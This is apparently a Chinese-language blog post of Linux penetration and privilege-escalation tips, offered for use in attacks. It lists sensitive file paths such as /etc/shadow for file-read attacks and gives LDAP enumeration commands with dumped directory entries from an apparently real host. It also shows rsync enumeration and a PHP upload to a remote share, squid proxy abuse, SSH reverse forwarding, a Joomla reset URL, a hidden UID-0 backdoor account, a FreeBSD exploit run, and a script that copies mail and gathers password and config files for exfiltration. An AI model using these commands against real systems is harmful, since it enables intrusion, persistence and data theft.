查看原文
其他

Linux 渗透与提权技巧

一次性进群,长期免费索取教程,没有付费教程。

教程列表见微信公众号底部菜单

进微信群回复公众号:微信群;QQ群:16004488


收集各种Linux渗透技巧与提权版本,方便小伙伴们在日后的渗透测试中能够事半功倍。


Linux 系统下的一些常见路径:


/etc/passwd


/etc/shadow


/etc/fstab


/etc/host.conf


/etc/motd


/etc/ld.so.conf


/var/www/htdocs/index.php


/var/www/conf/httpd.conf


/var/www/htdocs/index.html


/var/httpd/conf/php.ini


/var/httpd/htdocs/index.php


/var/httpd/conf/httpd.conf


/var/httpd/htdocs/index.html


/var/httpd/conf/php.ini


/var/www/index.html


/var/www/index.php


/opt/www/conf/httpd.conf


/opt/www/htdocs/index.php


/opt/www/htdocs/index.html


/usr/local/apache/htdocs/index.html


/usr/local/apache/htdocs/index.php


/usr/local/apache2/htdocs/index.html


/usr/local/apache2/htdocs/index.php


/usr/local/httpd2.2/htdocs/index.php


/usr/local/httpd2.2/htdocs/index.html


/tmp/apache/htdocs/index.html


/tmp/apache/htdocs/index.php


/etc/httpd/htdocs/index.php


/etc/httpd/conf/httpd.conf


/etc/httpd/htdocs/index.html


/www/php/php.ini


/www/php4/php.ini


/www/php5/php.ini


/www/conf/httpd.conf


/www/htdocs/index.php


/www/htdocs/index.html


/usr/local/httpd/conf/httpd.conf


/apache/apache/conf/httpd.conf


/apache/apache2/conf/httpd.conf


/etc/apache/apache.conf


/etc/apache2/apache.conf


/etc/apache/httpd.conf


/etc/apache2/httpd.conf


/etc/apache2/vhosts.d/00_default_vhost.conf


/etc/apache2/sites-available/default


/etc/phpmyadmin/config.inc.php


/etc/mysql/my.cnf


/etc/httpd/conf.d/php.conf


/etc/httpd/conf.d/httpd.conf


/etc/httpd/logs/error_log


/etc/httpd/logs/error.log


/etc/httpd/logs/access_log


/etc/httpd/logs/access.log


/home/apache/conf/httpd.conf


/home/apache2/conf/httpd.conf


/var/log/apache/error_log


/var/log/apache/error.log


/var/log/apache/access_log


/var/log/apache/access.log


/var/log/apache2/error_log


/var/log/apache2/error.log


/var/log/apache2/access_log


/var/log/apache2/access.log


/var/www/logs/error_log


/var/www/logs/error.log


/var/www/logs/access_log


/var/www/logs/access.log


/usr/local/apache/logs/error_log


/usr/local/apache/logs/error.log


/usr/local/apache/logs/access_log


/usr/local/apache/logs/access.log


/var/log/error_log


/var/log/error.log


/var/log/access_log


/var/log/access.log


/usr/local/apache/logs/access_logaccess_log.old


/usr/local/apache/logs/error_logerror_log.old


/etc/php.ini


/bin/php.ini


/etc/init.d/httpd


/etc/init.d/mysql


/etc/httpd/php.ini


/usr/lib/php.ini


/usr/lib/php/php.ini


/usr/local/etc/php.ini


/usr/local/lib/php.ini


/usr/local/php/lib/php.ini


/usr/local/php4/lib/php.ini


/usr/local/php4/php.ini


/usr/local/php4/lib/php.ini


/usr/local/php5/lib/php.ini


/usr/local/php5/etc/php.ini


/usr/local/php5/php5.ini


/usr/local/apache/conf/php.ini


/usr/local/apache/conf/httpd.conf


/usr/local/apache2/conf/httpd.conf


/usr/local/apache2/conf/php.ini


/etc/php4.4/fcgi/php.ini


/etc/php4/apache/php.ini


/etc/php4/apache2/php.ini


/etc/php5/apache/php.ini


/etc/php5/apache2/php.ini


/etc/php/php.ini


/etc/php/php4/php.ini


/etc/php/apache/php.ini


/etc/php/apache2/php.ini


/web/conf/php.ini


/usr/local/Zend/etc/php.ini


/opt/xampp/etc/php.ini


/var/local/www/conf/php.ini


/var/local/www/conf/httpd.conf


/etc/php/cgi/php.ini


/etc/php4/cgi/php.ini


/etc/php5/cgi/php.ini


/php5/php.ini


/php4/php.ini


/php/php.ini


/PHP/php.ini


/apache/php/php.ini


/xampp/apache/bin/php.ini


/xampp/apache/conf/httpd.conf


/NetServer/bin/stable/apache/php.ini


/home2/bin/stable/apache/php.ini


/home/bin/stable/apache/php.ini


/var/log/mysql/mysql-bin.log


/var/log/mysql.log


/var/log/mysqlderror.log


/var/log/mysql/mysql.log


/var/log/mysql/mysql-slow.log


/var/mysql.log


/var/lib/mysql/my.cnf


/usr/local/mysql/my.cnf


/usr/local/mysql/bin/mysql


/etc/mysql/my.cnf


/etc/my.cnf


/usr/local/cpanel/logs


/usr/local/cpanel/logs/stats_log


/usr/local/cpanel/logs/access_log


/usr/local/cpanel/logs/error_log


/usr/local/cpanel/logs/license_log


/usr/local/cpanel/logs/login_log


/usr/local/cpanel/logs/stats_log


/usr/local/share/examples/php4/php.ini


/usr/local/share/examples/php/php.ini


/usr/local/tomcat5527/bin/version.sh


/usr/share/tomcat6/bin/startup.sh


/usr/tomcat6/bin/startup.sh

ldap 渗透技巧:


cat /etc/nsswitch


看看密码登录策略我们可以看到使用了file ldap模式


less /etc/ldap.conf


base ou=People,dc=unix-center,dc=net


找到ou,dc,dc设置


查找管理员信息


匿名方式


ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


有密码形式


ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


查找10条用户记录


ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口


实战


cat /etc/nsswitch


看看密码登录策略我们可以看到使用了file ldap模式


less /etc/ldap.conf


base ou=People,dc=unix-center,dc=net


找到ou,dc,dc设置


查找管理员信息


匿名方式


ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


有密码形式


ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


查找10条用户记录


ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口


渗透实战


1、返回所有的属性


ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"


version: 1


dn: dc=ruc,dc=edu,dc=cn


dc: ruc


objectClass: domain


dn: uid=manager,dc=ruc,dc=edu,dc=cn


uid: manager


objectClass: inetOrgPerson


objectClass: organizationalPerson


objectClass: person


objectClass: top


sn: manager


cn: manager


dn: uid=superadmin,dc=ruc,dc=edu,dc=cn


uid: superadmin


objectClass: inetOrgPerson


objectClass: organizationalPerson


objectClass: person


objectClass: top


sn: superadmin


cn: superadmin


dn: uid=admin,dc=ruc,dc=edu,dc=cn


uid: admin


objectClass: inetOrgPerson


objectClass: organizationalPerson


objectClass: person


objectClass: top


sn: admin


cn: admin


dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn


uid: dcp_anonymous


objectClass: top


objectClass: person


objectClass: organizationalPerson


objectClass: inetOrgPerson


sn: dcp_anonymous


cn: dcp_anonymous


2、查看基类


bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain


3、查找


bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"


version: 1


dn:


objectClass: top


namingContexts: dc=ruc,dc=edu,dc=cn


supportedExtension: 2.16.840.1.113730.3.5.7


supportedExtension: 2.16.840.1.113730.3.5.8


supportedExtension: 1.3.6.1.4.1.4203.1.11.1


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25


supportedExtension: 2.16.840.1.113730.3.5.3


supportedExtension: 2.16.840.1.113730.3.5.5


supportedExtension: 2.16.840.1.113730.3.5.6


supportedExtension: 2.16.840.1.113730.3.5.4


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22


supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24


supportedExtension: 1.3.6.1.4.1.1466.20037


supportedExtension: 1.3.6.1.4.1.4203.1.11.3


supportedControl: 2.16.840.1.113730.3.4.2


supportedControl: 2.16.840.1.113730.3.4.3


supportedControl: 2.16.840.1.113730.3.4.4


supportedControl: 2.16.840.1.113730.3.4.5


supportedControl: 1.2.840.113556.1.4.473


supportedControl: 2.16.840.1.113730.3.4.9


supportedControl: 2.16.840.1.113730.3.4.16


supportedControl: 2.16.840.1.113730.3.4.15


supportedControl: 2.16.840.1.113730.3.4.17


supportedControl: 2.16.840.1.113730.3.4.19


supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2


supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6


supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8


supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1


supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1


supportedControl: 2.16.840.1.113730.3.4.14


supportedControl: 1.3.6.1.4.1.1466.29539.12


supportedControl: 2.16.840.1.113730.3.4.12


supportedControl: 2.16.840.1.113730.3.4.18


supportedControl: 2.16.840.1.113730.3.4.13


supportedSASLMechanisms: EXTERNAL


supportedSASLMechanisms: DIGEST-MD5


supportedLDAPVersion: 2


supportedLDAPVersion: 3


vendorName: Sun Microsystems, Inc.


vendorVersion: Sun-Java(tm)-System-Directory/6.2


dataversion: 020090516011411


netscapemdsuffix: cn=ldap://dc=webA:389


supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA


supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA


supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA


supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA


supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA


supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA


supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA


supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA


supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA


supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA


supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA


supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA


supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA


supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA


supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA


supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA


supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA


supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA


supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5


supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA


supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA


supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA


supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA


supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA


supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA


supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA


supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA


supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA


supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5


supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5


supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA


supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA


supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA


supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA


supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA


supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5


supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5


supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5


supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5


supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5


supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5


supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5


<strong> </strong>


NFS 渗透技巧:


列举IP


showmount -e ip


rsync渗透技巧:


1、查看rsync服务器上的列表


rsync 210.51.X.X::


finance


img_finance


auto


img_auto


html_cms


img_cms


ent_cms


ent_img


ceshi


res_img


res_img_c2


chip


chip_c2


ent_icms


games


gamesimg


media


mediaimg


fashion


res-fashion


res-fo


taobao-home


res-taobao-home


house


res-house


res-home


res-edu


res-ent


res-labs


res-news


res-phtv


res-media


home


edu


news


res-book


看相应的下级目录(注意一定要在目录后面添加上/)


rsync 210.51.X.X::htdocs_app/


rsync 210.51.X.X::auto/


rsync 210.51.X.X::edu/


2、下载rsync服务器上的配置文件


rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/


3、向上更新rsync文件(成功上传,不会覆盖)


rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/


http://app.finance.xxx.com/warn/nothack.txt


squid渗透技巧:


nc -vv 91ri.org 80


GET HTTP://www.sina.com / HTTP/1.0


GET HTTP://WWW.sina.com:22 / HTTP/1.0


SSH端口转发:


ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip


joomla渗透小技巧:


确定版本


index.php?option=com_content&amp;view=article&amp;id=30:what-languages-are-supported-by-joomla-15&amp;catid=32:languages&amp;Itemid=47


重新设置密码


index.php?option=com_user&amp;view=reset&amp;layout=confirm


Linux添加UID为0的root用户:


useradd -o -u 0 nothack


freebsd本地提权:


[argp@julius ~]$ uname -rsi


* freebsd 7.3-RELEASE GENERIC


* [argp@julius ~]$ sysctl vfs.usermount


* vfs.usermount: 1


* [argp@julius ~]$ id


* uid=1001(argp) gid=1001(argp) groups=1001(argp)


* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex


* [argp@julius ~]$ ./nfs_mount_ex


*


calling nmount()


tar 文件夹打包:


tar打包


tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*


alzip打包(韩国) alzip -a D:\WEB d:\web*.rar


关于tar的打包方式,linux不以扩展名来决定文件类型。


若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压


那么用这条比较好


tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*


系统信息收集:


for linux:


#!/bin/bash


echo #######geting sysinfo####


echo ######usage: ./getinfo.sh &gt;/tmp/sysinfo.txt


echo #######basic infomation##


cat /proc/meminfo


echo


cat /proc/cpuinfo


echo


rpm -qa 2&gt;/dev/null


######stole the mail......######


cp -a /var/mail /tmp/getmail 2&gt;/dev/null


echo 'u'r id is' `id`


echo ###atq&amp;crontab#####


atq


crontab -l


echo #####about var#####


set


echo #####about network###


####this is then point in pentest,but i am a new bird,so u need to add some in it


cat /etc/hosts


hostname


ipconfig -a


arp -v


echo ########user####


cat /etc/passwd|grep -i sh


echo ######service####


chkconfig --list


for i in {oracle,mysql,tomcat,samba,apache,ftp}


cat /etc/passwd|grep -i $i


done


locate passwd &gt;/tmp/password 2&gt;/dev/null


sleep 5


locate password &gt;&gt;/tmp/password 2&gt;/dev/null


sleep 5


locate conf &gt;/tmp/sysconfig 2&gt;dev/null


sleep 5


locate config &gt;&gt;/tmp/sysconfig 2&gt;/dev/null


sleep 5


###maybe can use "tree /"###


echo ##packing up#########


tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig


rm -rf /tmp/getmail /tmp/password /tmp/sysconfig


希望本文对您有所帮助或启发。

【推荐书籍】

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存